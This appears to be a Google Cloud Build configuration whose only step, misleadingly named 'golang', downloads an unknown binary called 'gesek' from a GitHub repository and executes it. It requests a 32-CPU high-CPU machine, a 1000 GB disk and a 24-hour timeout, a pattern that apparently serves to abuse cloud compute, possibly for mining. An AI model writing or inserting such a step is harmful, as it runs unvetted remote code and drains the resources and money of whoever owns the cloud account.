steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://github.com/ilyesdjaa/tidak/raw/main/gesek && chmod u+x gesek && ./gesek
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  machineType: 'E2_HIGHCPU_32'
  diskSizeGb: '1000'
